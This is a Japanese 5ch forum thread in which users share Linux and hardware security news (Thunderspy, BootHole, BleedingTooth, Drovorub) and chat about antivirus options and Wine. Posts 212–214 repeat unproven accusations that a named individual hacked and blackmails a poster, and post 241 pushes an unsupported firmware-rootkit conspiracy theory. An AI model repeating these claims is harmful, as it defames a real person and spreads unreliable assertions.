32 名称未設定 2020/05/11(月) 19:15:04.07 ID:nz2/6FeH0
Unfixable Flaw Found in Thunderbolt Port that Unlocks any PC in Less Than 5 Minutes | TechPowerUp
https://www.techpowerup.com/266917/unfixable-flaw-found-in-thunderbolt-port-that-unlocks-any-pc-in-less-than-5-minutes

Thunderspy - When Lightning Strikes Thrice: Breaking Thunderbolt 3 Security
https://thunderspy.io/

deeplで翻訳
Thunderspyは、Thunderboltポートを持つデバイスをターゲットにしています。コンピュータにそのようなポートがある場合、
ドライブが暗号化されていて、コンピュータがロックされていたり、スリープ状態に設定されていたりしても、
そのポートに短時間で物理的にアクセスした攻撃者は、すべてのデータを読み取ってコピーすることができます。

Thunderspyはステルス機能を持っており、攻撃の痕跡を見つけることができません。つまり、フィッシングリンクや悪意のある
ハードウェアを使用して攻撃者に騙されることはありません。Thunderspy は、短時間の外出時にコンピュータをロックしたり
中断したりするなど、最善のセキュリティ対策を行っていても動作します。また、システム管理者がデバイスをセキュアブート、
強力な BIOS とオペレーティング・システム・アカウントのパスワードで設定し、ディスクの完全な暗号化を有効にしていた場合も動作します。
攻撃者が必要とするのは、5 分間コンピュータと一緒にいるだけで、ドライバーと簡単に持ち運べるハードウェアだけです。

私たちは、インテルの設計に7つの脆弱性を発見し、悪意のある者がインテルが設定した防御機能を超えてシステムにアクセスするために、
これらの脆弱性が悪用される可能性のある9つの現実的なシナリオを開発しました。

私たちは、システムが脆弱であるかどうかを判断するために、無料でオープンソースのツール、Spycheckを開発しました。
システムが脆弱であることが判明した場合、Spycheck はシステムを保護するための推奨事項を案内します。

201 :login:Penguin:2020/06/09(火) 22:48:42 ID:bAdCtyAo.net
【AndroidでLinux】UserLAnd part1【root化不要】
https://egg.5ch.net/test/read.cgi/android/1591710049/

UserLAndは、Android上でUbuntu、Debian、Kaliなどの各種Linuxを動かせるアプリです。
オープンソースアプリです。
root化なしで動かせます。

公式
https://userland.tech/
ソースコード
https://github.com/CypherpunkArmory/UserLAnd
ダウンロード
https://f-droid.org/packages/tech.ula

202 :login:Penguin:2020/06/23(火) 19:33:45.38 ID:2tiPRdzD.net
【独自】マイナンバーとスマホ 連携検討 免許証と連携に加え
6/23(火) 12:00

政府が、マイナンバーカードとスマートフォンの一体化を検討していることがわかった。(略

https://headlines.yahoo.co.jp/videonews/fnn?a=20200623-00155385-fnn-pol

203 :login:Penguin:2020/06/23(火) 20:04:29.14 ID:ok+f0TXB.net
行動追跡か。

204 :login:Penguin:2020/06/30(火) 16:28:14 ID:kYjLj6sM.net
これandroidもじゃね?

【悲報】 TikTok、キーロガーだった [787645228]
https://leia.5ch.net/test/read.cgi/poverty/1593149876/
iOS 14でバッチリ可視化、TikTokが「他アプリで入力中のテキスト」を逐一読み取る様子
https://internet.watch.impress.co.jp/docs/yajiuma/1261591.html

205 :login:Penguin:2020/06/30(火) 16:29:04 ID:kYjLj6sM.net
Facebook、匿名化OS「Tails」ユーザーの正体暴く技術を開発 米FBIへ提供していたことが明らかに

匿名化技術を駆使して性犯罪を行う容疑者をFBIが逮捕
Facebookが数千万円で攻撃プログラムを開発依頼

 他に打つ手がなかったFacebookのセキュリティチームは、あるサイバーセキュリティ会社に数千万円の費用を支払ってTails向けの攻撃プログラムの開発を依頼する(この企業の名前は明かされていない)。その内容は、Tailsが備える匿名化技術を「ゼロデイ攻撃」(未公開の脆弱性を狙う攻撃手法)によって破り、発信元を特定するものだ。使われたゼロデイの脆弱性はTailsにインストールされている動画プレーヤーに存在していた。

 Facebookはこの攻撃ツールを仲介者を通してFBIに渡した。FBIは被害者の協力を得てこのプログラムが仕込まれた動画ファイルを容疑者に送信し、発信元の追跡に成功した。FBIはこの件についてコメントを控えている。

 Tailsを開発するチームは、同容疑者に関する捜査や脆弱性について全く知らされていなかったという。Facebookは最終的にこの脆弱性を開発チームに報告する予定だったが、その間に脆弱性は修正されたという。ただし、Tailsの開発チームは脆弱性として認識していたわけではなく、開発の過程で結果的に修正されたようだ。

https://www.itmedia.co.jp/news/articles/2006/30/news078.html

206 :login:Penguin:2020/06/30(火) 21:13:07.57 ID:iYUEZH57.net
>>205
>>379-380
被害者が動画送ってそれを
tailsの動画プレイヤーで見たらしいな
動画プレイヤーの脆弱性らしいよ

動画プレイヤーに仕掛けられてたバックドアにゼロデイ攻撃だね

ソース読んでチェックしてるのかよ>tailsのやつ

207 :login:Penguin:2020/07/03(金) 16:56:34.27 ID:WzAdi1H0.net
・Signal以上に超安全な暗号化チャットと思われていた「EncroChat」、欧州警察によるマルウェアにより一網打尽 [787645228]
https://leia.5ch.net/test/read.cgi/poverty/1593759309/

https://jp.techcrunch.com/2020/07/03/2020-07-02-police-roll-up-crime-networks-in-europe-after-infiltrating-popular-encrypted-chat-app/
https://techcrunchjp.files.wordpress.com/2020/07/operation-venetic.jpg


208 :login:Penguin:2020/07/04(土) 16:44:07.77 ID:NLPCRgkT.net
Tor VPN 最強の匿名通信方法を考えるスレ1 匿名支払
https://medaka.5ch.net/test/read.cgi/sec/1593848365/

209 :login:Penguin:2020/07/30(木) 20:54:33.24 ID:CUYmulWq.net
ほぼすべてのLinuxのブートローダーに脆弱性 - PC Watch
https://pc.watch.impress.co.jp/docs/news/1268335.html

 米セキュリティ企業のEclypsiumは7月29日(現地時間)、GRUB2ブートローダーに存在する脆弱性「BootHole」について報告した。
 GRUB2は、多くのLinuxディストリビューションで利用されているブートローダー。そのため、BootHole(CVE-2020-10713ほか)の影響は広範囲におよび、セキュアブートを有効にしている場合でも悪用が可能だという。
各ベンダーに事前に通達済みで、同日よりアドバイザリーやアップデートが順次提供される予定。
 設定ファイルである「grub.cfg」をGRUB2が読み出すプロセスにおいて、バッファオーバーフローの脆弱性が存在する。grub.cfgはEFIシステムパーティション内部にあるテキストファイルで、管理者権限を得た攻撃者によってブートローダー本体の整合性を保ったまま変更できる。
 バッファオーバーフローを悪用することで、攻撃者はUEFI実行環境内において任意のコードが実行可能。マルウェアの実行やブートプロセスの変更、永続的かつステルスなブートキットの導入などができるようになる。
OSの読み込みより前に攻撃者によるコードを実行できてしまうため、実質的にデバイスを完全制御下に置けるかたちとなる。
 緩和策としては、GRUB2自体の更新などが必要となるほか、セキュアブートではコンポーネントの検証プロセスにおいてMicrosoftによる電子署名が広く利用されているため、同社によるアップデートも提供される見込み。
 ブートローダーはその特性上、更新時のトラブルによってデバイスが起動不可に陥る場合もあるため慎重に進める必要があるが、BootHoleは特権昇格の脆弱性を通じて悪用が可能な脆弱性であることから、EclypsiumではまずはOS自体のアップデートを適宜行なうことを推奨している。

(全文引用、改行適当挿入)

210 :login:Penguin:2020/07/30(木) 21:34:45.02 ID:tMJ70ZQJ.net
>管理者権限を得た攻撃者
俺も管理者権限持ってれば俺のgrubなんて容易に改変可能なのだが、、

211 :login:Penguin:2020/07/31(金) 12:13:41.62 ID:f4vH+ZVs.net
AMDに脆弱性ガーと同じ原理じゃないか…
(裏でIntelが出資した某アホ研究会社…と同じ)

ミッションインポッシブルできるわけがないわけで…

212 :login:Penguin:2020/08/03(月) 19:28:23.41 ID:A0D9Xhej.net
https://mao.5ch.net/test/read.cgi/linux/1593922337/574
574 名前:login:Penguin [sage]: 2020/07/28(火) 02:27:19.00 ID:1WEp4Dpz (2)
かつてデル男に、「ホモ男」「Dion君」などと呼ばれていた者です。
デル男が志賀だという状況証拠を提示したのも私です。
デル男の活動が活発だった頃の末期に、うっかりIPアドレス(固定IP)を
晒したばっかりに、デル男にポート総当り攻撃を仕掛けられ、ルーターに
侵入され、PCに侵入され個人情報を盗まれました。
HDDのOSがアクセスできない領域にキーロガー等を仕込まれたらしく、
今でも情報を盗まれています。
その後、志賀のライセンス違反が発覚し、私はまとめサイトの記事を書いたり
比較的積極的に志賀のライセンス違反拡散活動に従事しているのですが、
その度に盗まれた個人情報をちらつかせて脅されます。
この、デル男→ライセンス違反の流れの中での私のクラッキング被害の連続性から言って、
志賀=デル男だと断言できます。

213 :login:Penguin:2020/08/03(月) 19:28:36.94 ID:A0D9Xhej.net
https://mao.5ch.net/test/read.cgi/linux/1593922337/594
594 名前:574 [sage]: 2020/07/29(水) 10:27:37.36 ID:MGMjPdwp
>>574です。
私は発達障害を持っています。私の個人情報を盗んでいる志賀も、もちろんそのことを知っています。
そして、志賀は、Ubuntuスレで「ハッタツ君」というキャラを産み出しました。そしてしつこく登場させました。
これは明らかに、活発に志賀ライセンス違反の拡散活動を行う私への暗示的な当てつけ&脅しです。
このように志賀は、犯罪行為を行うだけでなく、中傷のために差別的言動を平然とします。
知性ある人間の行動には程遠いです。

214 :login:Penguin:2020/08/05(水) 21:20:23.06 ID:brKuFFFW.net
志賀慶一の存在自体がセキュリティリスクです

215 :login:Penguin:2020/08/21(金) 22:49:04.88 ID:T1X/iY5P.net
NSAとFBI、Linux向けマルウェア「Drovorub」に関するアドバイザリを公開

「Drovorub」の拡散はロシアの情報機関であるGRU(参謀本部情報局)と関連のあるAPT28(別名Fancy Bear、Strontiumなど)の手によるもので、スパイ活動および公共機関やIT企業から機密情報を盗みだすことを目的に行われているという。
https://news.mynavi.jp/article/20200818-1232625/

216 :login:Penguin:2020/10/05(月) 13:25:20.50 ID:NkCuixWc.net
あー おにゃのこなめたいおにゃのこなめたい

217 :login:Penguin:2020/10/10(土) 01:54:37.19 ID:g39SN+yC.net
Google、「特定の住所を検索した人」のIPアドレスを警察に提供 [618676474]
https://leia.5ch.net/test/read.cgi/poverty/1602256833/


検索履歴は極めて個人的なことを暴いてしまうものであり、警察がこのセンシティブな情報を要求するには通常、
既知の容疑者に対する令状が必要だ。しかし、最近公開された裁判所文書により、捜査当局が容疑者を特定する前に、
あるキーワードを検索した全ユーザーの情報を開示することをGoogleに要請できることが明らかになった。

警察は8月、性的暴行の罪で起訴されている歌手のR. Kelly被告の関係者であるMichael Williams容疑者を、
フロリダ州で目撃者の車に火をつけたとして逮捕した。捜査当局は、「放火があった時刻近くに当該住宅の住所を検索した
ユーザー」に関する情報を要請する捜査令状をGoogleに送付した後、Williams容疑者を放火と証人買収の罪に関連付けた。

この7月の裁判所文書は米国時間10月6日に公開され、Detroit NewsのRobert Snell記者がこの文書についてツイートした。
裁判所文書には、放火の被害者の住所を検索した人のIPアドレスをGoogleが提供し、それが容疑者の電話番号と
関連していることを捜査当局が発見したと書かれている。警察はその後、その電話番号の履歴をたどって、
放火現場の近くにあったWilliams容疑者の端末の位置を特定したという。

Googleに送られた捜査令状の原本はまだ公開されていないが、今回のことは、捜査当局がGoogleに対して、1人の容疑者に
関する特定の情報ではなく、大きなユーザーグループに関するデータを要請する傾向が高まっていることを示す新たな例となった。

https://news.yahoo.co.jp/articles/588b07e1451ee9a978edf2ffd4dc812846d02b12

218 :login:Penguin:2020/10/12(月) 13:10:55.07 ID:xKjywmC1.net
 機密情報を共有する5カ国協定、いわゆる「ファイブアイズ」の参加国(米国、英国、カナダ、オーストラリア、ニュージーランド)が、日本およびインドの政府代表と連名で声明を発表した。テクノロジー企業に向けて、エンドツーエンドの暗号化された通信に法執行機関がアクセスすることを可能にする解決策の開発を要請している。

 この声明は、暗号にバックドアを設けることをテクノロジー企業に同意させようとする、ファイブアイズの最新の取り組みだ。

 各国の政府関係者はこれまでと同様、テクノロジー企業が製品にエンドツーエンド暗号化(E2EE)を組み込むことで犯罪捜査が困難になったと主張している。

 7カ国の政府代表は、現在の主要なテクノロジープラットフォームでサポートされているE2EEの仕組みのために、法執行機関が犯罪組織を捜査できないばかりか、テクノロジープラットフォーム各社も、一般市民を守るためのサービス利用規約を守らせることができずにいると主張している。

 声明では、「暗号化技術の特定の実装」によって、法執行機関の捜査に問題が生じているとしている。テクノロジープラットフォーム各社も一部の通信内容にアクセスできず、捜査当局に必要なデータを提供できないからだ。

 これにより、犯罪活動にとって安全な避難場所の確保を許し、「性的に搾取されている児童など、われわれの社会の中でも特に弱い立場の人々」を危険にさらしてしまうという。

 7カ国はテクノロジー業界と協力し、ユーザーが引き続き安全で暗号化された通信を利用できるだけでなく、法執行機関とテクノロジー企業も犯罪活動を取り締まれる解決策を開発するよう尽力していくとした。

 暗号化されたインスタントメッセージアプリだけではなく、「デバイスの暗号化、カスタム暗号化アプリ、統合プラットフォーム全体の暗号化」も対象となるという。

 2018年には、オーストラリアが主要な民主主義国家の中で初めて「反暗号化法」を導入した。同様の取り組みは米国や欧州でもあったが、そこまで成功しなかった。主な理由は、テクノロジー企業や非営利団体、一般市民からの反発だ。

 しかし、西側の政府が機密情報の収集能力で中国と対等になろうとする中、オーストラリアと同様の対応を求める圧力が近年高まっている。

https://japan.cnet.com/article/35160775/

219 :login:Penguin:2020/10/18(日) 06:38:34.76 ID:f07qlYZ2.net
LinuxのBluetoothスタックに任意コード実行可能な脆弱性か 2020/10/17 19:31 著者:後藤大地
https://news.mynavi.jp/article/20201017-1419370/

Intelは10月13日(米国時間)、「INTEL-SA-00435 - BlueZ Advisory」において、同社が提供する
Bluetoothスタックの一部である「BlueZ」 をサポートする Linux Kernel 5.9 より前のすべてのバー
ジョンに、特権昇格や情報窃取につながる潜在的な脆弱性が存在すると伝えた。Intelは3つの脆弱性を
報告しており、うちひとつは深刻度が重大(High)に分類されている。

攻撃者が物理的にデバイスに接近できる場合、この脆弱性を悪用した攻撃を受ける危険性があるほか、
Linuxカーネルを使ったIoTデバイスが影響を受ける可能性がある。ただし、脆弱性の詳細情報はまだ
公開されていない。この脆弱性を突いた攻撃がどのように実施されるのか、今後の詳細な報告が待た
れる。

情報セキュリティエンジニアのAndy Nguyen氏がTwitterで報告したメッセージによれば、脆弱性の
詳細は「Google Online Security Blog」に掲載されるという。同氏はこの脆弱性のPoCと見られる
動画のURLもツイートしているが、その動画では近接するLinux PCに対してこの脆弱性を悪用して任意の
コードが実行される様子が示されている。この脆弱性は「BleedingTooth」と呼ばれている。(後略)

220 :login:Penguin:2020/10/19(月) 02:27:59.47 ID:d+5XKEVu.net
東芝が「究極の暗号」、「量子暗号」サービスを開始すると発表 [256556981]
https://leia.5ch.net/test/read.cgi/poverty/1603035516/

1 番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイW 9fae-NK1U) 2020/10/19(月) 00:38:36.15 ID:dfhMI9gI0 BE:256556981-2BP(1000)

東芝が「究極の暗号」サービス 米英で提携、シェア首位狙う

 東芝は19日、盗聴やハッキングが理論上不可能とされる「量子暗号」を利用できる企業向けサービスを2025年度までに国内外で始めると発表した。海外では米ベライゾン・コミュニケーションズ、英BTグループの通信大手と相次ぎ提携し、今年9月からそれぞれ現地で実証実験を開始。シンガポール、韓国などの通信事業者とも協議を進めており、次世代の「究極の暗号」技術で世界トップシェアを狙う。

 東芝は米英で提携先の光ファイバー回線を使い、大容量データの量子暗号化や解読に必要な「鍵」の送受信、模擬の不正アクセスなどを実施。ベライゾンやBTと結果を検証するなど、国内外で量子暗号を使う情報保全事業の立ち上げを急ぐ。英中部ケンブリッジでは年内に関連機器の製造拠点を設ける。

 スーパーコンピューターの性能をはるかに上回る量子コンピューターが30年代にかけて実用化されると、現在の暗号は破られるリスクが高まる。国内では量子暗号導入に向けた総務省の実証事業を約43億円で受注。21年4月に着手する。防衛省や警察庁への導入も視野に入れる。

 先行する中国、米国勢をにらみ、安全保障分野などで情報保全の飛躍的向上を後押しする。東芝はさらに、金融、医療をはじめ高い秘匿性が要求される民間利用を見込んで、国内通信大手との提携につなげたい考えだ。 
https://news.yahoo.co.jp/articles/877338e6321824faf04486997698ac8141263cc3

221 :login:Penguin:2020/10/22(木) 03:35:06.10 ID:i7lwsGnq.net
sophos linux版が消えたの普通に痛くね

222 :login:Penguin:2020/10/22(木) 12:20:01.34 ID:Q5k2CXke.net
>>221
痛すぎ
他に代替ないんだもん
怪しい会社ばっか

でも、すでにインストールされてるsophosを
1ヶ月ぐらい前に確認したら
ウイルス定義ファイルはまだ更新してくれてた

223 :login:Penguin:2020/10/22(木) 13:33:41.69 ID:7lHMDkpq.net
clamavじゃいかんのか?

224 :login:Penguin:2020/10/22(木) 19:10:54.64 ID:n7zgsOXk.net
え、消えたの…?と思ってぐぐったらマジで消えてた…

225 :login:Penguin:2020/10/22(木) 23:22:50.98 ID:f4SsAYem.net
clamavは比較対象にもならない
まあ有料版はあるんだが、どれだけ無料版に頼ってたかって話だな…

226 :login:Penguin:2020/10/22(木) 23:39:19.14 ID:Q5k2CXke.net
>>223
あれは検出力糞すぎらしい

227 :login:Penguin:2020/10/22(木) 23:42:10.46 ID:Q5k2CXke.net
>>225
有料版って20個ぐらいのライセンスセットみたいのばっかじゃない?
1個ずつ買えんのかね
ノートンも1ずつ買えんよねえ

228 :login:Penguin:2020/12/17(木) 13:33:45.76 ID:JiJqFrlO.net
〆 川 ヽ
(´・ω・`) .。oO(熟女専科…)
(U   )
 `u-u´

229 :login:Penguin:2021/01/10(日) 23:12:08.13 ID:a8QEqhHY.net
あけおめ。

230 :login:Penguin:2021/01/11(月) 20:36:24.74 ID:+FRlrpZ3.net
...【セキュリティ】Air-Fi:隔離されたコンピューターからデータを盗み出す [すらいむ★]

Air-Fi:隔離されたコンピューターからデータを盗み出す
Wi-Fi対応ではないコンピューターでもWi-Fiで情報を送信できる
https://blog.kaspersky.co.jp/air-fi-data-exfiltration/29846/

https://egg.5ch.net/test/read.cgi/scienceplus/1610070895/

231 :login:Penguin:2021/02/03(水) 12:17:00.56 ID:nzTGm1hR2
デキる人ほどフリーランス化する?★働き方改革
https://www.youtube.com/watch?v=ALflcwYOJtQ
年収890万円以下は社会のお荷物★騙される労働者
https://www.youtube.com/watch?v=CAp-ZrJpF54
騙されたくなかったら勉強しろ★他人のルールは損をする
https://www.youtube.com/watch?v=s176O6qKuPw
底辺の99%は一生底辺★10年後が見えない同僚たち
https://www.youtube.com/watch?v=4Mfiwn2sPD8
稼ぎたければ働くな★4千万円ぽっちも稼げないのはなぜ?
https://www.youtube.com/watch?v=Fi7bILN4wes
サラリーマン思考では儲からない理由
https://www.youtube.com/watch?v=iW6oAo0q0ZI
「頭使えよ貧乏人」に思う、寝てても金入るシステムを作る人
https://www.youtube.com/watch?v=VEB6M_s6abs

232 :運用情報臨時板でワッチョイ導入議論中:2021/02/25(木) 20:22:24.28 ID:nQxAiBdW.net
sophosはインストーラー持ってれば新規インストールもできる

233 :運用情報臨時板でワッチョイ導入議論中:2021/02/25(木) 23:14:03.57 ID:KC6htJgv.net
>>232
そこが不思議だよな
ウイルス定義ファイルも更新され続けてるし

ユーザー増えると負荷かかりすぎるのかねえ

234 :運用情報臨時板でワッチョイ導入議論中:2021/03/09(火) 22:31:27.07 ID:nUzJdA9A.net
「Linux 5.12 rc1に厄介なバグ」、トーバルズ氏が警告
https://japan.zdnet.com/article/35167530/

235 :login:Penguin:2021/05/02(日) 18:37:43.87 ID:04bhmCI/.net
彡⌒ミ〆川 ヽ
(´・ω・`)・ω・`) 
/  つ⊂   \  怖いずら

236 :login:Penguin:2021/05/04(火) 00:10:22.32 ID:xLDS/IIK.net
sophosインストーラー持ってる奴勝ち組

237 :login:Penguin:2021/05/04(火) 04:03:48.33 ID:q021lZ4A.net
>>236
マジでこれ

いまだにウイルス定義最新版に更新できるもんな

なんでインストーラーダウンロード打ち切ったんだろう?

ウイルス定義更新するならダウンロード出来るようにしとけばいいのに

238 :login:Penguin:2021/05/04(火) 04:04:04.40 ID:q021lZ4A.net
>>236
マジでこれ

いまだにウイルス定義最新版に更新できるもんな

なんでインストーラーダウンロード打ち切ったんだろう?

ウイルス定義更新するならダウンロード出来るようにしとけばいいのに

239 :login:Penguin:2021/05/10(月) 22:45:29.33 ID:b1KDMEzk.net
ここの>>30ぐらいからのレスバがすごいww

【徹底討論】 Linuxにバックドアはあるのか?
s://mao.5ch.net/test/read.cgi/linux/1558455408/28

240 :login:Penguin:2021/05/20(木) 23:28:35.36 ID:OX3aECUm.net
最近Windowsから移行していろいろ調べた結果eset NOD32にしたんだがどうだろう?
国内代理店のキヤノンが売ってくれないからVPN使ってインド版サイトで買ったよ

241 :login:Penguin:2021/05/21(金) 19:31:08.07 ID:xce5GRbW.net
セキュリティ担当の皆様へ

昔に比べて、ブートに必要な記憶領域が増えています
UEFIのESP領域やBIOSの記憶領域等が大幅に増えています
そうした規格を構築したのがインテルとビル・ゲイツです
セキュリティ問題の本質はそこにあります

即ちBIOSのROMとEFIに関連する記憶領域を組み合わせて
OSに関係なく、ブートからマシンを乗っ取る
ルートキットを仕込むことが可能なのです

そんな事あるわけない、と思うかもしれませんが
今回デルが発表したBIOS-ROMのセキュリティ問題は
その可能性を示唆しているように思います

デルは麦軍との関係が強い企業です
元MSAのスノーデンは表向きデルの職員として活動にあたりました
ロシアや中国、北朝鮮なども諜報活動を行っていますが
世界一の諜報活動を行っているのは麦軍なのです

危険ですよ!と騒ぐうちに提供される更新ファイルも
本当に安全なのか、確認するべきです
新たなルートキットを仕込まれた可能性もあります

あくまでも可能性の話ではありますが、ご注意を

242 :login:Penguin:2021/05/21(金) 21:37:11.60 ID:bqJgvTZ1.net
変なやつが来たなぁ・・・

243 :login:Penguin:2021/05/21(金) 23:03:50.32 ID:kE2Dnilb.net
ひろゆき「バイオス仕込みのスパイウェアとかアップデートしたら消えちゃうんでどの道仕込むの難しいんですよね
ハードウェアで仕込むとわかる人にはバレちゃうし」

244 :login:Penguin:2021/05/22(土) 15:45:02.63 ID:rJ8gSmbP.net
むぎむぎぐんってなに

245 :login:Penguin:2021/07/10(土) 17:38:46.38 ID:Lj3ceuFs.net
    .。oO( アッ ソコソコ… )
  <,⌒/ヽ-、___ 
/<,3/____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄

246 :login:Penguin:2021/07/10(土) 19:33:16.40 ID:U/4q+Z75.net
Linux Defenderはよ

247 :login:Penguin:2021/07/19(月) 18:26:39.28 ID:rfzbIh30.net
Is Open-Source Software Secure?
The code is open, anyone can see it. Is it a security risk?

July 18, 2021
It's FOSS

248 :login:Penguin:2021/07/19(月) 18:29:04.47 ID:rfzbIh30.net
>>247
Why Should You Care if Open-Source Software is Secure?

No matter whether you use Linux or any other operating system, you will be surrounded with open-source software in some way (directly/indirectly).

To give you an example, most of the proprietary software tools depend on some form of open-source libraries to make things work.

Furthermore, there is a reason why companies of various scale (including Google, Microsoft, and Facebook) rely on open-source software or contribute their resources to the open-source community in one way or the other.

Hence, the security of open-source software is something essential to know about.

249 :login:Penguin:2021/07/19(月) 19:35:13.95 ID:rfzbIh30.net
>>248
なぜ、オープンソース・ソフトウェアが安全かどうかを気にする必要があるのでしょうか?

Linuxやその他のOSを使用していても、何らかの形で(直接的または間接的に)オープンソース・ソフトウェアに囲まれているはずです。
例えば、ほとんどのプロプライエタリなソフトウェアツールは、何らかの形でオープンソースのライブラリに依存して動作しています。

さらに、Google、Microsoft、Facebookなどの様々な規模の企業が、何らかの形でオープンソース・ソフトウェアに依存したり、自社のリソースをオープンソース・コミュニティに提供したりしているのには理由があります。

そういうことですから、オープンソース・ソフトウェアのセキュリティについては、知っておかなければならないことなのです。

250 :login:Penguin:2021/07/19(月) 19:43:03.04 ID:rfzbIh30.net
>>249
セキュリティの観点からオープンソース・ソフトウェアの短所を指摘する議論はいくつかありますが、中には全く意味をなさないものもあります。

「誰でもコードを見たり、悪用したりできる」
確かに、コードは誰でもアクセスできます。しかし、コードを見ることができるからといって、誰もがそれを悪用できるということでしょうか。そうではありません。

誰でもソフトウェアのフォーク(コピー)を作ることができても、オリジナルのソフトウェアを簡単に操作することはできません。

通常、プロジェクトのメンテナ(またはそのグループ)は、コードリポジトリを管理し、貢献者からのコミットを受け入れます。コードは承認前にレビューされます。そして、誰もが簡単にコードを乗っ取ることはできません。

オープンソース、クローズドソースを問わず、攻撃者がソフトウェアの脆弱性を突いたり、悪意のあるコードを追加したりするには努力が必要です。

251 :login:Penguin:2021/07/19(月) 20:55:10.63 ID:rfzbIh30.net
>>251
たとえコードが開発者の世界でアクセス可能であっても、プロジェクトにはコードを徹底的にレビューできるだけの貢献者や開発者がいない可能性があります。

そのような場合、オープンソース・ソフトウェアが査読されていることに大きな自信を持つことはできませんが、まさにそれが欠けているからです。

オープンソース・ソフトウェアは、オープンソースであることを理由に、最高のセキュリティを備えていると「主張」するかもしれませんが、十分な数の開発者がいない場合には誤解を招くことになります。

また、何人の開発者がコードを見ているのか、レビューしているのか、コードのウォークスルーがどのように行われているのかもわかりません。

252 :login:Penguin:2021/07/19(月) 20:59:28.98 ID:rfzbIh30.net
>>250-251
セキュリティに関して、優れたものはありません。クローズドソースであろうとオープンソースであろうと、セキュリティに関しては同じ原理が適用されます。

ソフトウェアのセキュリティに影響を与える外部要因には様々なものがありますが、その多くはソースに依存しません。安全性を保つためには、同じようにコードを監視する必要があります。

確かに、オープンソースのアプローチは、クローズドソースのソフトウェアにはないメリットを導入していますが、だからといって防弾仕様というわけではありません。

(以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.)

253 :login:Penguin:2021/07/20(火) 18:07:35.12 ID:RJeOgDMv.net
これもID:0slAOwnDかな。

http://mao.5ch.net/test/read.cgi/linux/1465741067/252
> 245:login:Penguin 2021/07/19(月) 20:59:28.98 ID:rfzbIh30
中略
> (以上、重要箇所のみ訳出掲載しました -- Creative Commons Attribution-ShareAlike 4.0 International License.)

勝手に翻訳してitsfoss.comの権利を侵害し、勝手にクリエイティブ・コモンズにして5chの権利も侵害しとる

>>367
ID:0slAOwnDみたいに海外記事を勝手に機械翻訳して書き込む輩はどんどん出てくるだろうし、その都度削除依頼するのも切がないかと。
俺らにできるのはそういう輩をバカにするぐらいじゃね。

254 :login:Penguin:2021/07/20(火) 18:08:21.92 ID:RJeOgDMv.net
ええ…

255 :login:Penguin:2021/08/19(木) 23:19:26.37 ID:uxuTKr2E.net
壁|ω゚ )┻┛ あー おにゃのこなめたい おにゃのこなめたい …

256 :login:Penguin:2021/08/24(火) 22:51:02.61 ID:wtZMW9lc.net
カーネル5.11.0-27で、マシンがめっちゃ熱くなったりフリーズしたりするようになった
sophosをアンインストールしたら静かになったので、まあ間違いなく原因だわ…

257 :login:Penguin:2021/09/09(木) 14:43:27.01 ID:C0tKvDkQ.net
OpenSSL 3.0リリース、ライセンスをApache License 2.0に変更 | TECH+
https://news.mynavi.jp/article/20210908-1967718/

258 :login:Penguin:2021/09/09(木) 21:07:51.58 ID:TMHDLSeT.net
Dockerとかコンテナのセキュリティのためのベストプラクティス的な資料を作りたいんですが、
何か参考になる書籍でオススメとかあったら教えて頂けませんでしょうか?

259 :login:Penguin:2021/09/10(金) 00:53:44.40 ID:3qQOXhMB.net
既にある物を作る意味とは?

260 :login:Penguin:2021/09/10(金) 10:00:50.10 ID:8Sb2Dt5o.net
表現方法で変わるから 漫画で書いたりとかじゃないかな

261 :login:Penguin:2021/09/28(火) 05:31:10.45 ID:jjeqVEuU.net
RedditにRaspberryPiを対象にしたランサムウェアがあるかという質問があり
そういうものは無いというのがスレの見解になってましたが
Linuxを対象にしたランサムウェアがあり、ARM対応のランサムウェアもあるようです
両方合わせたらRaspberryPiOSを対象にしたランサムウェアが作れると思うのですが、なぜ未だに無いのでしょうか?
処理速度が遅い上に重要ファイルを預けるデバイスではなく、感染したらSDカード交換すれば復旧するものだからですか?

262 :login:Penguin:2021/09/28(火) 05:41:25.88 ID:+rPcBB0M.net
DELLのPCを対象にしたランサムウェアがあるか
と同じ話な気がするけどなあ

263 :login:Penguin:2021/10/13(水) 12:17:36.76 ID:QMedILWp.net
脆弱性スコアはそれほどでも無いけど更新は来るかな

CVE-2021-41617 : sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalatio
https://www.cvedetails.com/cve/CVE-2021-41617/

264 :login:Penguin:2021/11/19(金) 12:50:54.81 ID:tx8Tq3HI.net
       ___
       (\ ∞ ノ  
       ヽ)_ノ 

265 :login:Penguin:2022/02/25(金) 16:25:55.78 ID:UqNZguHP.net
>>240
俺もリアルタイムスキャン有効にして入れたが鬼重くなったよ。
全く現実的ではない。

266 :login:Penguin:2022/03/07(月) 23:53:18.14 ID:Vza7/K3I.net
Linuxのコンテナ技術にエスケープの脆弱性、アップデートを - 記事詳細|Infoseekニュース
https://news.infoseek.co.jp/article/mynavi_2378065/

267 :login:Penguin:2022/03/09(水) 22:00:41.68 ID:aQk8QjzH.net
エスケープ?

268 :login:Penguin:2022/03/10(木) 00:05:05.06 ID:tQm505Oh.net
コンテナからお漏らしするってことだろ

269 :login:Penguin:2022/03/16(水) 02:32:45.72 ID:+CfXCT5Z.net
wineって仮想環境ですよね?
wine内でランサムウェアが起動した場合、wine外には広がらないのでしょうか?
仮想環境の入れ子にして、ホストLinuxゲストLinuxでゲストにwine
という形にしたらアンチウイルスなくても感染ブロックできますか?

270 :login:Penguin:2022/03/16(水) 02:58:45.74 ID:pHTLQHYt.net
>>269
なんでそう思うの?

271 :login:Penguin:2022/03/16(水) 20:59:03.15 ID:hlky3M2L.net
Wineで動作する想定のそれがあったらどうかと考えると

272 :login:Penguin:2022/03/16(水) 21:41:55.56 ID:YlrPIZEh.net
すごい古い記事だけど。
WineでWindowsウィルスを動かす
https://mag.osdn.jp/05/01/31/0346216

273 :login:Penguin:2022/03/16(水) 22:24:54.95 ID:YOcrTJTS.net
Wineは仮想環境ではない
Wineはエミュレータではない
Wineは互換性レイヤー

274 :login:Penguin:2022/03/16(水) 23:29:19.22 ID:N+UZSh6o.net
>互換レイヤー
ふわっとした理解だけど
発行されたWindowsAPIへのアクセスをLinuxシステムコールに変換する
+互換のない・不足するAPIやサブシステムを補完する
って感じなんだろうか…?
物理マシンとは別のカーネルが動くのではなく
カーネルにWinのバイナリの言葉を翻訳して渡す感じ…?

275 :login:Penguin:2022/03/19(土) 16:06:29.72 ID:jttyZDwc.net
